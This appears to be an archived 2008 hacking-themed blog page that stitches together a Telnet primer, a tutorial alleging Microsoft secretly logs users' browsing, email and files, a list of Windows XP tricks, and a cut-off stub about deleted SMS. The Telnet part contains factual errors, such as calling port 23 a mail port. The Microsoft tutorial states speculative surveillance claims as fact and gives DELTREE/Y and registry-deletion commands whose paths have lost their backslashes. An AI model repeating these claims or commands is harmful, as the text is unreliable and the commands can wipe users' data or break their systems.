Hacking Mafia: September 2008

Friday, September 26, 2008

All about Telnet 101

Don't use this for illegal stuff::

Introduction:

Telnet is used to connect to remote machines through emulation. This means that
it can connect to a server, any server instantly because of it's ability to emulate (copy)
remote computers.

Lets Start:

In Windows, Telnet can be found by going to Start -> Run and then typing telnet.
The application should then pop up. If you don't have Windows, there are many Telnet alternatives for mac, linux etc. Since I don't know any,search the internet for Telnet for Linux or Telnet for Mac and you should find something instantly.

If you have a PC and are using Windows 98/95, 2000, Me, or XP continue...

As you can see, Telnet has 4 menu options. These are Connect, Edit, Terminal, and Help.

If you click Connect, you should see more options. Here they are.

Connect:

Remote System..
Disconnect

Exit

Names of servers you have been on.

To connect to a server, click Remote System...

This will then take you to a dialog box that has these fields:

Hostname:
Port:
TermType:

There should also be a Connect button and a Cancel Button.

Lets go over these & what you should put in them.

-Hostname-

The Hostname can be the address of the website your going to be connecting to:

http://www.oreos.com

or it can be the IP address. Keep in mind that you can only connect to servers and not to clients (other PCs)

an IP Address looks like this:

210.111.23.45

-Port-

Port can bb either the port number you wanna connect to on the server (Port 80 is the Internet, Port 23 is Simple Mail Protocol then there are some more ports for different things..)

or you can keep it Telnet and see what happens.

-TermType-

TermType is the type of Terminal telnet will be acting like.
This doesn't matter most of the time, so you can keep it to default or try other ones if you want.

When you have all this set up, you can Click Connect & see what happens.

Note: Sometimes many servers don't like anon people just logging on, so be careful when logging onto servers, because sometimes it might be some big company that likes bullying people or just SOMEONE who likes bullying people and then they might want to find you or trace you or something and I know for a fact you don't need that happening.

Another Note: When you go to a server and type something, such as a login name or a password, you might not see anything even though you are typing. this is a feature that telnet or the other server uses. It's for some kind of safety measure.

Ok that's all for the Connect Menu, lets go over the Terminal menu.

The terminal menu should have 3 options:

Prefernces
Start Logging
Stop Logging.

-Prefernces-

If you go to this, a dialog box will come up with various options. Here, you can change the
text color & background color of the program, and you can enable Local Echo, which shows
you everything you've typed, Blinking cursor if you want the cursor to blink check it, if not uncheck, Block cursor if you want the cursor to be shown as a block, VT100 Arrows, don't worry about these they are useless, Buffer Size, this allows you to set the number of lines of text you want to be shown before the screen starts to scroll, The Terminal emualtion type, always have this set on the default unless you know what the second one is and you know what your doing.

-Start Logging-

This logs everything you do on Telnet in a log file on your computer.

-Stop Logging-

This will stop logging processes.

The Information Microsoft Hides on Your Computer

Here are folders on your computer that Microsoft has tried hard to keep secret. Within these folders you will find two (major) things: Microsoft Internet Explorer has been logging all of the sites you have ever visited -- even after you've cleared your cache, and Microsoft's Outlook and Outlook Express has been logging ALL of your e-mail correspondence -- even after you've erased them from your trashbin. (This also includes all incoming and outgoing e-mail attachments.) And believe me, that's not even the half of it.
When I say that these files are hidden well, I really mean it. If you don't have any knowledge of DOS, then don't plan on finding these files on your own. I say this because some of these files will only be found in DOS while some of these folders can only be found in Windows Explorer. Additionally, there are some folders that will not be displayed by neither DOS nor Explorer -- but can only be found using a workaround. Basically what I am saying is if you didn't know these files existed then the chances of you running across them is slim to slimmer.
To give you an example of how sneaky this is, there are three hidden folders that may contain your name, address, phone, all the sites you've visited, every single e-mail you've sent/received, every attachment you've ever sent/received, everything you've searched for in a search engine, every filename you've downloaded, names of documents containing "sensitive" information, copies of all your cookies, full readable e-mail from your hotmail account, your PGP keys, and more.
Funny that Microsoft would make no mention of this on microsoft.com.
FORWARD:
I know there are some people out there that are already aware of some of the things I mention. I also know that most people are not. The purpose of this tutorial is teach people what is really going on with Microsoft's products and how to take control of their privacy again.
Thanks for reading.
INDEX
1. DEFINITIONS AND ACRONYMS
2. WHY YOU SHOULD ERASE THESE FILES
3. HOW TO ERASE THE FILES ASAP (Recommended for the non-savvy.)
3.1) If You Own Microsoft Internet Explorer
3.2) Clearing Your Registry
3.3) If You Own Outlook Express
3.4) Slack files
3.5) Keeping Microsoft Internet Explorer (Not recommended at all.)
4. STEP-BY-STEP GUIDE THROUGH YOUR HIDDEN FILES (For the savvy.)
5. A LOOK AT OUTLOOK
6. HOW MICROSOFT DOES IT
7. +S MEANS [S]ECRET NOT [S]YSTEM
8. THE TRUTH ABOUT FIND FAST
8.1) Removing Find Fast
9. HOW HARD MICROSOFT TRIED TO KEEP PEOPLE FROM FINDING ABOUT IT
10. FINAL NOTE AND CONTACT INFORMATION
10.1) Recommended reading
11. SPECIAL THANKS
12. REFERENCES
Coming Very Soon:
mailbox.pst
pstores
Related Windows Tricks.
Reflection of why they use alphanumeric folders (9J3X7QZF4.)
Everything you didn't want to know about Find Fast.
The NSA-Key.
The [Microsoft Update] button.
Why the temp folders aren't intended to be temporary at all.
What's in those .dbx files?

--------------------------------------------------------------------------------
1. DEFINITIONS AND ACRONYMS
Well, the best definition I have been able to come up with is the following:
I) A "really hidden" file/folder is one that cannot be seen in Windows Explorer after enabling it to view all files, cannot be seen in MS-DOS after receiving a directory listing, and cannot be searched through using the "Find" utility.
a) There is at least one workaround to enabling Explorer to see them.
b) There is at least one workaround to enabling MS-DOS to see them.
c) There is at least one workaround to enabling the "Find" utility to search through them.
d) They are hidden intentionally.
II) Distinguishes "really hidden" file/folders from just plain +h[idden] ones, such as your "MSDOS.SYS" or "Sysbckup" folder.
III) Distinguishes from certain "other" intended hidden files, such as a file with a name of "šŸëœx¥."
DOS = Disk Operating System
MSIE = Microsoft Internet Explorer
TIF = Temporary Internet Files (folder)
HD = Hard Drive
OS = Operating System

--------------------------------------------------------------------------------
2. WHY SHOULD I ERASE THESE FILES?
1) Besides the glaring privacy risks.
2) Besides the fact that Microsoft is keeping these logs intentionally. (For reasons I can only imagine.)
3) These files can take up huge amounts of disk space. I've personally inspected a computer with almost 200 megs of this stuff, so you can imagine how much this can slow your computer down. After following these instructions you will probably notice a great improvement in performance.

--------------------------------------------------------------------------------
3. HOW TO ERASE THE FILES ASAP
Step by step information on how to erase these files as soon as possible. This section is recommended for the non-savvy. Further explanation can be found in Section 4.0. Please note that following these next steps will erase all your cache files, all your cookie files, and all of your e-mail correspondence. If you use the offline content feature with MSIE, following these next steps will remove this as well.

--------------------------------------------------------------------------------
3.1. IF YOU OWN A COPY OF MICROSOFT INTERNET EXPLORER
1) Shut your computer down, and turn it back on.
2) While your computer is booting keep pressing the [F8] key until you are given an option screen.
3) Choose "Command Prompt Only" (This will take you to true DOS mode.)
4) When your computer is done booting, you will have a C:> followed by a blinking cursor. Type in this hitting enter after each line.

CDWINDOWSTEMPOR~1
DELTREE/Y CONTENT.IE5
(If that didn't work then type this:)

CDWINDOWSAPPLIC~1TEMPOR~1
DELTREE/Y CONTENT.IE5
(If that didn't work then type this:)

CDWINDOWSLOCALS~1TEMPOR~1
DELTREE/Y CONTENT.IE5
(If this still does not work, and you are sure you are using MSIE5, then please e-mail me. Finding the location of these is a mission, and I'd certainly like to know where else MSIE likes to hide its cache. I believe older versions of MSIE keep them under "c:windowscontent".)
5) This will take a ridiculous amount of time to process. The longer it takes, the more records Microsoft had stored about you. When it gets done erasing that folder, then type this:

CD
DELTREE/Y TEMP
DELTREE/Y WIN386.SWP
CD WINDOWS
DELTREE/Y COOKIES
DELTREE/Y TEMP
DELTRE/Y WIN386.SWP
DELTREE/Y HISTORY

--------------------------------------------------------------------------------
3.2. CLEARING YOUR REGISTRY
Reboot your computer and wait for Windows to load back up.
1) Drop to DOS ("Start" > "Program Files" > "MS-DOS Prompt") and type this at prompt:

regedit
2) Your Registry Editor will pop up. Go to "Edit" > "Find"
3) Type in "TypedURLs" and then hit [Find Next]. You will be taken to all the places you've typed in URLs manually. 4) Erase any URLs that you find. Do not erase the folders. (They will be called "01," "02," "03," etc...) Double click on them to make sure they are URLs. I found mine here:

HKEY_USERS/Default/Software/Microsoft/Internet Explorer/TypedURLs/
HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/TypedURLs/
5) and while you're in here you might as well go here:

HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current
Version/Explorer/RemoteComputer/NameSpace/
{d6277990-4c6a-11cf-8d87-00aa0060f5b5}
6) Delete the {d6277990-4c6a-11cf-8d87-00aa0060f5b5} key. This will make the "Find: Files or Folders" utility perform searches much faster.

--------------------------------------------------------------------------------
3.3. IF YOU HAVE OUTLOOK OR OUTLOOK EXPRESS INSTALLED
1) Install another e-mail program like Eudora, or Pegasus Mail. Make sure everything is setup correctly.
2) Backup any e-mail that you wish to save. (Print them out, or forward them to another box.)
3) Uninstall Outlook.
Warning, this conveniently does not erase any e-mail correspondence. To double check drop back to your DOS prompt and type this:

dir *.mbx /s/p
dir *.mbx /s/p/ah
The files you are looking for are:
INBOX.MBX
OUTBOX.MBX
SENTIT~1.MBX
DELETE~1.MBX
DRAFTS.MBX
If these files come up they will be listed in either of these folders:

C:WindowsApplication DataMicrosoftOutlook ExpressMail
C:Program Filesinternet mail and news%USER%mail
(If the .mbx files are located anywhere else then you probably don't want to delete them since they aren't from outlook. If they are from outlook, however, then please e-mail me.)
Now type either of the following (depending on the location of your .mbx files). Remember, this will erase all your e-mail correspondence so backup what you want to keep by printing them out or forwarding them to another box. Hopefully by now you have already set up Eudora or Pegasus Mail.

CDWINDOWSAPPLIC~1MICROS~1OUTLOO~1
DELTREE/Y MAIL
or

CDPROGRA~1INTERN~1%USER%
(replace "%user%" with the proper name.)

DELTREE/Y MAIL

--------------------------------------------------------------------------------
3.4. SLACK FILES
As you may already know, deleting files only deletes the references to them. They are in fact still sitting there on your HD and can be easily recovered by anyone.

BCWipe is a nice program that will clear these files.
For you DOS buffs, there's a program called FileDust that got a 5 star rating on ZDNET, if that matters.
If you are using PGP then there is a "Freespace Wipe" option under PGPtools.
Norton Utilities has a nice filewiping utility.
You might want to check out Evidence Eliminator's 30 day trial. This is probably the best program as far as your privacy goes.

--------------------------------------------------------------------------------
3.5. KEEPING MICROSOFT INTERNET EXPLORER
If you insist on using Microsoft Internet Explorer then I strongly recommend that you check out at least one of these programs:

PurgeIE
Anonymizer Window Washer
Cache and Cookie Washer for IE
I have already tried and tested some other programs and you'd be surprised on how many of them DON'T pass the tests. For example, HistoryKiller 2001 claims it erases all the files, but don't count on it.

--------------------------------------------------------------------------------
4. STEP-BY-STEP GUIDE THROUGH YOUR HIDDEN FILES
This next section is for those of you who are more interested in learning the ins and outs of your computer. This section is intended for the savvy user.
1) First, drop to DOS and type this at prompt (in all lower-case):

c:windowsexplorer /e,c:windowstempor~1content.ie5
You see all those alphanumeric names listed under "content.ie5?" (left-hand side) That's Microsoft's idea of making this project as hard as possible. (Earlier versions of Internet Explorer simply called them "cache#.") These are your alphanumeric folders that MSIE has created to keep your cookies and cache. Write these names down. (They should look something like this: 6YQ2GSWF, QRMTKLWF, U7YHQKI4, 7YMZ516U, WQK6Z9UV, etc...) If you click on any of these folders then nothing will be displayed. Not because there aren't any files here, but because Windows Explorer has lied to you. If you want to view the contents of these alphanumeric folders you will have to do so in DOS. (Actually, there is a workaround that Skywalker taught me, but it's a little bit harder to explain. I promise to cover this tip in the next version.)
2) Restart in MS-DOS mode. (You must restart because windows has "locked" down some of the files.)
3) Type this in at prompt:

CDWINDOWSTEMPOR~1CONTENT.IE5
CD %alphanumeric%
(replace the "%alphanumeric%" with the first name that you just wrote down.)

DIR/P
Note: Not only are you in a folder that DOS claims does not exist, but you are now looking at cache/cookies that Windows Explorer claims do not exist.
These folders are directly responsible for the mysterious erosion of hard drive space you may have been noticing. Just a couple interesting things you can find in here:

Pictures from all those porn sites you've visited.
Other internet cache files completely wasting your disk space.
If you use Hotmail (or any webmail service) you can probably see some of your old messages laying around here. To see them for yourself, copy them into another directory and open them with your browser.
Retrieving your personal information from these cookies is a snap. For example if you've ever shopped at Amazon.com then there's access to your name and e-mail. If you're a user on Hollywood.com then there's your city, state, and zip. MP3.com keeps some goodies as well.
Feel free to check out all your alphanumeric folders, before going on to the next step.
5) Type this in:

CDWINDOWSTEMPOR~1CONTENT.IE5
EDIT /75 INDEX.DAT (or "EDIT /16 index.dat")
You will be brought to a blue screen with a bunch of binary.
6) Press and hold the [Page Down] button until you start seeing lists of URLs. These are all the sites that you've ever visited as well as a brief description of each. You'll notice it records everything you've searched for in a search engine in plain text, in addition to the URL.
7) When you get done searching around you can go to "File" > "Exit."
8) Next you'll probably want to erase these files by typing this:

DELTREE/Y C:WINDOWSTEMPOR~1
(replace "c:windowstempor~1" with the location of your TIF folder if different.)
This will take a seriously long time to process. Then go check out your History.
9) Type this:

CDWINDOWSHISTORYHISTORY.IE5
EDIT /75 INDEX.DAT (or "EDIT /16 index.dat")
You will be brought to a blue screen with more binary.
10) Press and hold the [Page Down] button until you start seeing lists of URLS again.
This is another recording of the sites you've visited. There also may be some other things in here. E-mail me if you find anything interesting. I will share with you a snippet of what I found in my index.dat file.

Client UrlCache
MMF Ver 5.2@
@ 3 yiâ
€
àOÐ ê:+0
0�
'
}*Á� 5.t
xt
59

MS6C:%

\DAVE'S
HD.TXT
MSIE5.
C:
Did you note the "C:" and "\DAVE'S HDMSIE5.TXT"?
"Dave" is the fictitious name that I use on my computer. "Dave's HD" is the name of my root folder on my LAN. "MSIE5.TXT" is the name of a text file that I've been saving on my computer. It contains research from THIS project that I've been working on. Mostly URLs and notes.
Do you see anything wrong with this picture? It took notice on a file on my HD, folks. MY HARD DRIVE. Not only that, but it is saving it in a folder that cannot be seen by neither DOS nor Windows Explorer. Is it a coincidence that this file was related to the research of this tutorial?
Obviously, my first suspicion was that Microsoft was scanning my HD and logging any "sensitive" information. In this case, my msie5.txt probably had something in it that Microsoft didn't like. To read more about my findings read "THE TRUTH ABOUT FIND FAST" in section 8.0.
1) If you're still with me, type this:
CDWINDOWSHISTORY
2) check out the mmXXX.dat files (and delete them), then type:

CDWINDOWSHISTORYHISTORY.IE5
CD MSHIST~1
EDIT /75 INDEX.DAT (or "EDIT /16 index.dat")
More URLs from your internet history. Note there are probably other mshist~x folders here. 3) You can repeat these steps for every occurrence of the mshistxxxxxxxx file.
4) By now you'll probably want to type in this:

CD WINDOWS
DELTREE/Y HISTORY
This is about it as far as I know. You may also want to take a look at your *.mbx files if you own Outlook. (dir *.mbx/s) More detailed information is covered in the next chapter.

--------------------------------------------------------------------------------
5. A LOOK AT OUTLOOK EXPRESS
Would you think twice about what you said if you knew it was being recorded? E-mail correspondence leaves a permanent record of everything you've said -- even after you've told Outlook to erase it. You are given a false sense of security sense you've erased it twice, so surely it must be gone. The first time Outlook simply moves it to your "Deleted Items" folder. The second time you erase it Outlook simply "pretends" it is gone. The truth is your messages are still being retained in a "really hidden folder."
Furthermore, as if that wasn't disturbing enough, Outlook Express also keeps records of EVERY SINGLE file attachment in an ENCRYPTED database. Can you believe this, folks?
For example, I attached this zip file and sent it to myself.

PK '…Ž*}�™ P AAAÀ�€ Öø)-8³PK +…Ž*8øM3 P
BBBÀ�€ ×ø%-8³PK .…Ž*ÄÖ.� P CCCÀ�€ Øø!-8³PK
2…Ž*² å` P DDDÀ�€ Ùø -8³PK '…Ž*}�™ P
AAAPK +…Ž*8øM3 P 1BBBPK
.…Ž*ÄÖ.� P bCCCPK 2…Ž*² å` P
"DDDPK ÄÄ
And it recorded this in both my inbox.mbx file and outbox.mbx file:

UEsDBBQAAAAIACeFjip9jZkaEAAAAFAAAAADAAAAQUFBrcCBAAAAAIAg1vgpljizAFBLAwQUAAAA
CAArhY4qOPhNMxAAAABQAAAAAwAAAEJCQq3AgQAAAACAINf4JZY4swBQSwMEFAAAAAgALoWOKsTW
Lp0QAAAAUAAAAAMAAABDQ0OtwIEAAAAAgCDY+CGWOLMAUEsDBBQAAAAIADKFjiqyEuVgEAAAAFAA
AAADAAAARERErcCBAAAAAIAg2fgdljizAFBLAQIUABQAAAAIACeFjip9jZkaEAAAAFAAAAADAAAA
AAAAAAEAIAAAAAAAAABBQUFQSwECFAAUAAAACAArhY4qOPhNMxAAAABQAAAAAwAAAAAAAAABACAA
AAAxAAAAQkJCUEsBAhQAFAAAAAgALoWOKsTWLp0QAAAAUAAAAAMAAAAAAAAAAQAgAAAAYgAAAEND
Q1BLAQIUABQAAAAIADKFjiqyEuVgEAAAAFAAAAADAAAAAAAAAAEAIAAAAJMAAABERERQSwUGAAAA
AAQABADEAAAAxAAAAAAA
Cheers to the first person to discover the algorithm.
Anyway, by now you are probably wishing you knew where these records were kept. Don't worry they're right here:

c:program filesinternet mail and news%user%mail*.mbx
(replace %user% with the name you use.)
Or, if you're lucky:

c:windowsapplication datamicrosoftoutlookmail*.mbx
I found it odd that the first time I installed outlook, my e-mail data was saved automatically into "internet mail and news." After I uninstalled and reinstalled, it changed its mind and put it into my "application data."
To erase these files simply type: (of course if you do this you will kill all of your e-mail messages, so backup what you want to keep.)

Deltree c:windowsintern~1%user%mail
or

Deltree c:windowsapplic~1micros~1outloo~1mail

--------------------------------------------------------------------------------
6. HOW MICROSOFT DOES IT
Ever wonder how Microsoft makes these folders invisible to both DOS and Windows Explorer? I was completely baffled by how Microsoft was accomplishing this since even using a DOS 6.2 boot disk wouldn't work for me. I was honestly pretty upset that the answer escaped me for so long, but after wondering around in the folders I finally figured it out.
The "desktop.ini" is a standard text file that can be added to any folder to customize certain aspects of the folder's behavior. In these cases, Microsoft utilized the desktop.ini file to make these files invisible. Invisible to Windows Explorer, invisible to DOS, and even invisible to the "Find" Utility (so you wouldn't be able to perform searches in these folders!)
Here are a couple examples:
Found in the c:windowstemporary internet filesdesktop.ini and the c:windowstemporary internet filescontent.ie5desktop.ini contains this text:

[.ShellClassInfo]
UICLSID={7BD29E00-76C1-11CF-9DD0-00A0C9034933}
Found in the c:windowshistorydesktop.ini and the c:windowshistoryhistory.ie5desktop.ini contains this text:

[.ShellClassInfo]
UICLSID={7BD29E00-76C1-11CF-9DD0-00A0C9034933}
CLSID={FF393560-C2A7-11CF-BFF4-444553540000}
The UICLSID line cloaks the folder in both DOS and Explorer. The CLSID line disables the "FIND" utility from searching through the folder. Additionally, it gives a folder the appearance of the "History" folder. (You'll know what I mean if you fiddle with them enough.)
Erasing these desktop.ini files will give DOS and Windows Explorer proper viewing functionality once again. The problem with erasing them is windows will reconstruct them on your next bootup. The workaround is to edit the desktop.ini files and remove everything except for the [.ShellClassInfo]. This will trick windows into thinking they have still covered their tracks, so they won't think to reconstruct them again.
By the way, if you erase these keys from your Registry it will not un-hide these folders. Still, I'm sure somebody could play with this enough to figure out a way to completely disable Microsoft from ever hiding files on your computer again.

--------------------------------------------------------------------------------
7. +S MEANS [S]ECRET NOT [S]YSTEM
Here are three easy true or false questions regarding DOS. Play along like you needed to know the answers to get your A+ certification.
1) True or false: Executing the dir/s command in root will display all the "normal" files and directories on your hard drive.
The correct answer is 'true.'
2) True or false: Executing the dir/s/ah command in root will display all the "hidden" files and directories on your hard drive.
Again, the correct answer is 'true.'
3) True or false: Executing the dir/s/as command in root will display all the "system" files and directores on your hard drive.
The correct answer is 'you wish.'
When DOS tries to get a list of the subdirectories of any +s[ystem] folder it hits a brick wall. Not only does this mean Microsoft has taken extra precautions to keep people from finding these files, but it defeats the whole purpose of the "/s" switch in the first place. Nice one.
In case you didn't understand, here's a small experiment that will show you what I mean.
Since the content.ie5 and history.ie5 subfolders are both located within a +s[ystem] folder, we will run the experinment with them. The proper command to locate them should be this:

CD
DIR *.IE5 /s/as
The problem is that you will receive a "No files found" error message.
This proves that all subfolders/files that are located within a system folder will not be listed. But believe me, it's there.
Now, the really interesting thing is that you (luckily) can get around this brick wall. That is, once you are in the system folder, then the brick wall no longer has an effect on the directory listings. For example:

CDWINDOWSTEMPOR~1
DIR *.IE5 /as
1 folder(s) found.
Oh good, now you can see them. (But only after you knew the exact location.) In other words, if you didn't know the folders existed then finding them would be almost impossible.

--------------------------------------------------------------------------------
8. THE TRUTH ABOUT FIND FAST
Have you ever wondered what that "Find Fast" program was under your control panel? I've spent about an hour on microsoft.com reading help files and I STILL have no clue of what it's good for. Here's the most informative snippet I found on microsoft.com.
"The Find Fast Indexer is a utility that builds indexes to speed finding documents using the Open and Open Office Documents commands in Microsoft Office programs, including Microsoft Outlook."
So what does that mean? Well, if you read it carefully you'll see that Microsoft never mentions that it will speed up your searches. In fact it has nothing to do with the "Find: Files or Programs" utility. I think what Microsoft is really trying to say is that when you go to "File" > "Open" under Microsoft Word, then your list of documents will be displayed quicker.
If that is what they are saying then it is a lie. I hope you don't think I am taking Microsoft's quote out of context here. I'm only trying to show you all the methods that Microsoft went through to make it appear that the Find Fast utility speeds up searches.
For example if you go to "Edit" (under Microsoft Word), you will notice there is a "Fast Find" icon next to it. (Binoculars icon.) This is usally a clear indication that it is related to the Find Fast program. However, if you re-read that quote, it doesn't mention anything about finding words "within" a document, but only the document itself. Here are some more quotes from Microsoft:
"The Find Fast Indexer tool tracks the location on the hard disk of all Microsoft Word for Windows documents by default. When one of these files is moved, the Find Faster Indexer tool updates its index."
"Indexes are used to make file searches faster in Office programs."
"The Find Fast Indexer is installed on your computer when you install Microsoft Office 97. Find Fast builds an index to speed up finding documents from the Open dialog box in Microsoft Office programs."
I wasn't able to find one single shred of evidence that it helped you "search" faster. Yet, Microsoft insisted on calling the program "Find Fast." THEN they decided to add the Find Fast icon next to the [Search Document], as if Find Fast had anything to do with searching the document.
So now do you think you know the truth?
What would you say if I told you that Find Fast was scanning and indexing every single file on your hard drive? Did you know that in Office 95, the Find Fast Indexer had an "exclusion" list comprised of .exe, .swp, .dll and other extensions, but the feature was eliminated? If you were a programmer, would you program Find Fast to index every single file, or just the ones with Office extensions?
Here are some other interesting facts:
Find Fast automatically loads on every boot (because it added to your Startup folder.)
If you have ever had problems with scandisk (restarting due to "disk writes."), it is because Find Fast was indexing your hard drive in the background.
Now here is a good example of the lengths Microsoft has gone through to keep people from finding out Find Fast indexes their hard drives. (Always good to have an alibi.) And I quote:
"When you specify the type of documents to index in the Create Index dialog box, Find Fast includes the document types that are listed in the following table.
Doc Type File Name Extension
Microsoft Office files All the Microsoft Excel, Microsoft Web documents PowerPoint, Microsoft Project, and Microsoft Word document types listed in this table. Microsoft Binder (.odb, .obt) and Microsoft Access (.mdb) files. Note that in .mdb files, only document properties are indexed.
Microsoft Excel workbooks .xl* files
Microsoft PowerPoint files .ppt (presentation), .pot (template), .pps (auto-running presentation) files
Microsoft Project files .mpp, .mpw, .mpt, .mpx, .mpd files
Microsoft Word documents .doc (document), .dot (template), .ht* (Hypertext Markup Language document), .txt (text file), .rtf (Rich Text Format) files
All files *.* files

Did you get that last part? If you were a wealthy man and you decided to buy every single car in the car lot, would you
a) Say, "I'll take the red ones, the blue ones, the silver ones, the white ones, the champagne ones, and all of them," or
b) "I'll take them all sir."
As you can see, they don't want people to realize that Find Fast is keeping an index of your entire hard drive. They walk around the car lot saying "I'll take the red ones, the blue ones, the silver ones,..."
I personally witnessed the Find Fast Indexer "creep" its way back into my Startup folder after I removed it. There's no possible way I could have done this on purpose. In fact the only way I could have done it is if I created a shortcut to Find Fast and then moved the shortcut into Startup manually. There's no option on the Find Fast program to add it to Startup.
Am I making this up? Did I imagine it? Well, even if I am, then that doesn't change the overwhelming amount of inconsistencies. For example:
1) Drop to DOS
2) CD
3) DIR FF*.* /AH (This will bring up a listing of ffast-related files.)
4) edit /75 %ff% (insert %ff% with any of the names that were listed.)
Notice the incredible amount of disk accesses to your "really hidden" "Temporary Internet Files" folder? What is the obsession that Find Fast has with these hidden folders, anyway?

--------------------------------------------------------------------------------
8.1. REMOVING THE FIND FAST PROGRAM
1) Reboot your computer in MS-DOS Mode.
2) Delete the FindFast.CPL file from c:windowssystem
3) Delete the shortcut under c:windowsstart menuprogramsstartup
4) Delete the FindFast.EXE file from c:progra~1micros~1office
Other related files that are safe to erase:
5) FFNT.exe, FFSetup.dll, FFService.dll, FFast_bb.dll, "c:>ff*.*"
Notice you will loose no functionality after erasing these files? Actually, you will gain functionality.

--------------------------------------------------------------------------------
9. HOW HARD MICROSOFT TRIED TO KEEP PEOPLE FROM FINDING ABOUT IT
In case the desktop.ini file wasn't enough proof. ("Whoops, we didn't know the desktop.ini file would turn folders invisible?") And in case you thought disabling DOS's "/s" switch for system folders was just a "bug." And in case you thought Microsoft disabled the Find utility from searching through the folders just to save you time (uh huh) -- then feel free to check out this thread on the Hackers.com BBS.

--------------------------------------------------------------------------------
10. FINAL NOTE AND CONTACT INFO
This tutorial is being updated ALL THE TIME. If you have any input then please e-mail me so I can compile it into future versions. You may have noticed many requests to contact me throughout this tutorial. This is because I am very eager to find out everything there is to know about this. But just so I am not swamped with old updates, please make sure you are reading the most current version.
My e-mail address is located below. Although it may not be done in a timely fasion, I always reply to all of my e-mail. By the way, I deleted my PGP due to security reasons. So if you want to contact me privately, then I'm sure we can work out something else.
Thanks for reading, -- The Riddler
e-mail: mailto:ther1ddler@fuckmicrosoft.com?Subject=Feedback from fuckMicrosoft.com Article
hangout: http://www.hackers.com/bulletin/

--------------------------------------------------------------------------------
10.1. RECOMMENDED READING
And if you aren't already paranoid enough here's some sites/articles that I definitely reccomend:
http://www.theregister.co.uk/content/4/18002.html
http://www.findarticles.com/m0CGN/3741/55695355/p1/article.jhtml
http://www.mobtown.org/news/archive/msg00492.html
http://194.159.40.109/05069801.htm
http://www.yarbles.demon.co.uk/mssniff.html
http://www.macintouch.com/o98security.html
http://www.theregister.co.uk/content/archive/3079.html
http://www.fsm.nl/ward/
http://slashdot.org/
http://www.peacefire.org/
http://stopcarnivore.org/
http://nomorefakenews.com/
http://grc.com/steve.htm#project-x

--------------------------------------------------------------------------------
11. SPECIAL THANKS
Thank you Skywalker, for being in the right place at the right time. You were the only one who seemed interested in helping me further my research.
Thank you to everybody who has e-mailed me specifically just to thank me. The kind words mean a lot to me and played a big motivator to get this text finished.
And thank you to Hackers.com, for developing a fantatsic site with a great community feel, without which, this tutorial would never have existed.

--------------------------------------------------------------------------------
12. REFERENCES
http://support.microsoft.com/support/kb/articles/Q137/1/13.asp
http://support.microsoft.com/support/kb/articles/Q136/3/86.asp
http://support.microsoft.com/support/kb/articles/Q169/5/31.ASP
http://support.microsoft.com/support/kb/articles/Q141/0/12.asp
http://support.microsoft.com/support/kb/articles/Q205/2/89.ASP
http://support.microsoft.com/support/kb/articles/Q166/3/02.ASP
http://www.insecure.org/sploits/Internet.explorer.web.usage.logs.html
http://www.parascope.com/cgi-bin/psforum.pl/topic=matrix&disc=514&mmark=all
http://www.hackers.com/bulletin/
http://slashdot.org/articles/00/05/11/173257.shtml
http://peacefire.org/

XP HIDDEN SECREATES

Defrag

Secret - Hidden Command Line Switch

Instructions - Go to "Start", "Run" and Type defrag c: -b to defragment the Boot and Application Prefetch information. Similar to what BootVis invokes.

Paint

Secret - Image Trails

Instructions - Open an image and hold down Shift then drag the image around to create an image trail.

Secret - 10x Zoom

Instructions - Open an image and select the magnifying glass icon. Left-Click exactly on the line below the 8x.

Game Secrets

FreeCell

Secret - Instant Win

Instructions - Hold down Ctrl + Shift + F10 during game play. Then you will be asked if you want to Abort, Retry or Ignore. Choose Abort, then move any card to instantly win.

Secret - Hidden Game Modes

Instructions - In the "Game" menu choose "Select Game". Enter -1 or -2 to activate the hidden game modes.

Minesweeper

Secret - Reveal Mines

Instructions - Minimize or close all running applications. Launch Minesweeper, then type xyzzy. Next hold down either shift key for one second. Now when you move the mouse cursor over a Minesweeper square you will see a tiny white pixel in the top left corner of your desktop screen. This pixel will change to black when your mouse moves over a mine. You may need to change you desktop background to a solid color other then white or black to see the pixel.

Pinball

Secret - Extra Balls

Instructions - Type 1max at the start of a new ball to get extra balls.

Secret - Gravity Well

Instructions - Type gmax at the start of a new game to activate the Gravity Well.

Secret - Instant Promotion

Instructions - Type rmax at the start of a new game to go up in ranks.

Secret - Skill Shot

Instructions - Launch the ball partially up the chute past the third yellow light bar so it falls back down to get 75,000 points. There are six yellow light bars that are worth a varying amount of points:

First: 15,000 points

Second: 30,000 points

Third: 75,000 points

Fourth: 30,000 points

Fifth: 15,000 points

Sixth: 7,500 points

Secret - Test Mode

Instructions - Type hidden test at the start of a new ball to activate Test Mode. No notification will be given that this is activated but you can now left-click the mouse button and drag the ball around.

Secret - Unlimited Balls

Instructions - Type bmax at the start of a new ball. No notification will be given that this is activated but when a ball is lost a new ball will appear from the yellow wormhole indefinitely. Once this is activated you will be unable to activate other secrets without restarting the game.

Solitaire

Secret - Instant Win

Instructions - Press Alt + Shift + 2 during game play to instantly win.

Secret - Draw single cards in a Draw Three game

Instructions - Hold down CTRL + ALT + SHIFT while drawing a new card. Instead of drawing three cards you will only draw one.

OS Secrets

Add/Remove

Secret - Hidden Uninstall Options

Instructions - Warning: Proceed at your own risk! Browse to C:\Windows\inf\ and make a backup copy of sysoc.inf. Then open the original file C:\Windows\inf\sysoc.inf in notepad. Go to "Edit" and select "Replace". In "Find what:" type ,hide and in "Replace with:" type , then select "Replace All", save and close the file. Go to the control panel, "Add/Remove", select "Add/Remove Windows Components". You will now see many more Windows components to uninstall. Do not remove anything with no label or that you do not recognize or fully understand what it does. Doing so can break certain functionality in Windows.

Control Panel

Secret - Hidden Control Panel Extensions

Instructions - Download and install TweakUI, launch, go to "Control Panel" and check any item not selected, then "Apply" and "OK". You will now see the hidden control panel extensions.

Device Manager

Secret - Hidden Devices

Instructions - Go to the control panel, "System" icon, "Hardware" tab and select "Device Manager". Select View and Show hidden devices.

Music

Secret - Music from the Installer

Instructions - Browse to C:\Windows\system32\oobe\images\title.wma and play.

Shutdown

Secret - Display Hibernate Option on the Shut Down dialog

Instructions - Go to "Start", "Turn Off Computer..." and press either Shift key to change the "Stand By" button to "Hibernate".

Support Tools

Secret - Over 100 Windows XP Support Utilities are on the install CD

Instructions for Pre-SP2 users - If you do not have SP2 installed, put the original Windows XP CD in the CD-ROM Drive, run the D:\Support\Tools\setup.exe

Read Deleted SMS

Read Deleted SMS!!
A SMS once deleted can’t be read again….but sometimes we hurrily delete some important SMS
